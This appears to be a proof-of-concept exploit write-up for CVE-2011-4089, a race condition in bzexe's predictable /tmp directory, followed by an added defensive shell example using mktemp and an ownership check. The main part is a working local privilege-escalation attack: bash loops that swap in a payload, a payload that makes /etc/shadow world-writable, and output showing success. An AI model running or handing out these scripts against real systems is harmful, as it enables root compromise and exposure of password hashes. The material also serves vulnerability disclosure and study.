Larry W. Cashdollar 11/5/2011

PoC code for http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632862 (CVE-2011-4089).
Credit to vladz for finding this.

Note: people have written exploits in C, based on this script, that win the race 100% of the time.

The exploit works as follows.

1. Determine which files are bzexe'd on the system, say bash.

2. Create a matching directory you own in /tmp.

3. Create an exploit script in /tmp, say:

cat > /tmp/bad << EOF
#!/bin/sh
chmod 777 /etc/shadow
EOF

4. Watch for the existence of /tmp/bash/gztmp*; we want to know before the gztmp file is renamed to bash.

larry@b0rk:~$ while (true) do ./exp.sh ; done

#!/bin/bash
if [ -a /tmp/bash/gztmp* ]
then
    echo "Exploting bzexe."
    mv /tmp/bash /tmp/bash.dir
    echo "Copying evil file into place."
    cp /tmp/bad /tmp/bash
fi

This is a difficult race condition to win with a shell script (about 60% of the time), but it can be won 100% of the time with the exploits written in C.

Failures will show:

root@b0rk:/root# ./bash <-- missed copy
./bash: 22: /tmp/bash: not found
root@b0rk:/root# ./bash <-- race failed because permissions weren't set yet on bash from cp
./bash: 22: /tmp/bash: Permission denied

Success will show:

root@b0rk:/root# ./bash
root@b0rk:/root# ls -l /etc/shadow
-rwxrwxrwx 1 root shadow 1024 2010-07-03 11:55 /etc/shadow

larry@b0rk:~$ while (true) do ./exp.sh ; done
Exploting bzexe.
Copying evil file into place.
Exploting bzexe.
Copying evil file into place.
Exploting bzexe.
Copying evil file into place.
Exploting bzexe.
Copying evil file into place.
Exploting bzexe.
Copying evil file into place.

Removing the echo commands from the exploit will increase the probability of winning the race.

TODO:
- put the while loop in the exploit.sh script
- remove the echo's
- write it in C using inotify()

#!/bin/bash
# gain root on a system using bzexe to compress binaries
# /tmp/exec will be executed as the user running the bzexe'd binary if we win the race.
mkdir /tmp/$1
while true ; do
    if [ -a /tmp/$1/gztmp* ]
    then
        # echo "Exploting bzexe."
        mv /tmp/$1 /tmp/$1.dir
        # echo "Copying our evil code into place."
        cp /tmp/exec /tmp/$1
    fi
done
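The race above only exists because the decompressor stub works out of a fixed, guessable directory (/tmp/<program name>) that any local user can pre-create and then rename away. The script below is an added example, not part of this PoC or of bzexe itself: it puts the weak pattern next to the hardened one (a private mktemp directory) and adds the ownership/mode check a stub should make before trusting any path under a world-writable /tmp. The function names and the use of ls -ld for the check are this example's own choices.

```shell
#!/bin/sh
# Added example (not bzexe's code): predictable vs. private work directory.

# Weak pattern, the layout the race depends on: a fixed path named after
# the program. mkdir -p "succeeds" even when another user created the
# directory first, so the caller ends up writing into a directory it does
# not own and later executes a path that user can replace.
weak_workdir() {
    dir="${TMPDIR:-/tmp}/$1"
    mkdir -p "$dir" 2>/dev/null || return 1
    printf '%s\n' "$dir"
}

# Hardened pattern: an unpredictable mode-0700 directory created atomically
# by mktemp, so there is nothing to pre-create, watch for, or rename away.
safe_workdir() {
    dir=$(mktemp -d "${TMPDIR:-/tmp}/$1.XXXXXX") || return 1
    chmod 700 "$dir" || { rmdir "$dir"; return 1; }
    printf '%s\n' "$dir"
}

# Returns 0 (true) when a path must not be used as a work directory: it is a
# symlink, not a directory, not owned by the caller, or writable by group or
# others. Parses ls -ld so it runs on both GNU and BSD userlands.
is_hijackable() {
    [ -L "$1" ] && return 0
    [ -d "$1" ] || return 0
    set -- "$1" $(ls -ld "$1")          # $2 = mode string, $4 = owner
    case "$2" in
        d????-??-?*) ;;                  # no group/other write bit
        *) return 0 ;;
    esac
    [ "$4" = "$(id -un)" ] || return 0
    return 1
}
```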